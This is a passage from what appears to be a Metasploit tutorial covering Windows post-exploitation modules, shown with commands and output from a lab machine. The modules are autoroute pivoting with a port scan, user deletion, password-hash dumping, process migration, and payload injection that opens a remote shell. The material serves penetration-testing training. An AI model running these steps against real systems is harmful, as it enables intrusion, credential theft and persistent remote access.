autoroute
The autoroute post module creates a new route through a Meterpreter sessions allowing you to pivot deeper into a target network.
meterpreter > run post/windows/manage/autoroute SUBNET=192.168.218.0 ACTION=ADD [*] Running module against V-MAC-XP [*] Adding a route to 192.168.218.0/255.255.255.0... meterpreter > Background session 5? [y/N] y
With our new route added, we can run additional modules through our pivot.
msf exploit(ms08_067_netapi) > use auxiliary/scanner/portscan/tcp msf auxiliary(tcp) > set RHOSTS 192.168.218.0/24 RHOSTS => 192.168.218.0/24 msf auxiliary(tcp) > set THREADS 50 THREADS => 50 msf auxiliary(tcp) > set PORTS 445 PORTS => 445 msf auxiliary(tcp) > run [*] Scanned 027 of 256 hosts (010% complete) [*] Scanned 052 of 256 hosts (020% complete) [*] Scanned 079 of 256 hosts (030% complete) [*] Scanned 103 of 256 hosts (040% complete) [*] Scanned 128 of 256 hosts (050% complete) [*] 192.168.218.136:445 - TCP OPEN [*] Scanned 154 of 256 hosts (060% complete) [*] Scanned 180 of 256 hosts (070% complete) [*] Scanned 210 of 256 hosts (082% complete) [*] Scanned 232 of 256 hosts (090% complete) [*] Scanned 256 of 256 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(tcp) >
delete_user
The delete_user post module deletes a specified user account from the compromised system.
meterpreter > run post/windows/manage/delete_user USERNAME=hacker
[*] User was deleted!
meterpreter >
We can them dump the hashes on the system and verify that the user no longer exists on the target.
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...
Administrator:500:7bf4f254b228bb24aad1b435b51404ee:2892d26cdf84d7a70e2fb3b9f05c425e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:2e61920ebe3ed6e6d108113bf6318ee2:5abb944dc0761399b730f300dd474714:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:92e5d2c675bed8d4dc6b74ddd9b4c287:::
meterpreter >
migrate
The migrate post module will migrate to a specified process or if none is given, will automatically spawn a new process and migrate to it.
meterpreter > run post/windows/manage/migrate
[*] Running module against V-MAC-XP
[*] Current server process: svchost.exe (1092)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 672
[*] New server process: Explorer.EXE (672)
meterpreter >
multi_meterpreter_inject
The multi_meterpreter_inject post module will inject a given payload into a process on the compromised host. If no PID value is specified, a new process will be created and the payload injected into it. Although, the name of the module is multi_meterpreter_inject, any payload can be specified.
meterpreter > run post/windows/manage/multi_meterpreter_inject PAYLOAD=windows/shell_bind_tcp [*] Running module against V-MAC-XP [*] Creating a reverse meterpreter stager: LHOST=192.168.1.101 LPORT=4444 [+] Starting Notepad.exe to house Meterpreter Session. [+] Process created with pid 3380 [*] Injecting meterpreter into process ID 3380 [*] Allocated memory at address 0x003a0000, for 341 byte stager [*] Writing the stager into memory... [+] Successfully injected Meterpreter in to process: 3380 meterpreter > ^Z Background session 5? [y/N] y msf exploit(handler) > connect 192.168.1.195 4444 [*] Connected to 192.168.1.195:4444 Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>ipconfig ipconfig Windows IP Configuration Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : localdomain IP Address. . . . . . . . . . . . : 192.168.1.195 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.1.1 Ethernet adapter Local Area Connection 2: Connection-specific DNS Suffix . : localdomain IP Address. . . . . . . . . . . . : 192.168.218.136 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.218.2 C:\WINDOWS\system32>